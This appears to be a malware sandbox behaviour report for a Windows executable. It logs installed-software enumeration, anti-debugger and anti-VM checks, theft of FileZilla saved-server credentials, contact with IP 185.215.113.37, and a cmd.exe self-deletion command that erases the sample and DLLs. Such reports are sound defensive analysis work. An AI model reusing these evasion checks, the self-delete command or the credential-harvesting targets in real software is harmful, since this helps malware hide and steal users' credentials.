RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExA Sept. 30, 2024, 11:19 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x80000002 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	C:\Windows\System32\cmd.exe /c timeout /t 5 & del /f /q "C:\Users\test22\AppData\Local\Temp\66f6b6b7f2ec8_intro.exe" & del "C:\ProgramData\*.dll"" & exit
cmdline	"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\test22\AppData\Local\Temp\66f6b6b7f2ec8_intro.exe" & del "C:\ProgramData\*.dll"" & exit

Communicates with host for which no DNS query was performed (1 event)

host

185.215.113.37

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 53 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Sept. 30, 2024, 11:19 a.m.	class_name: 18467-41 window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
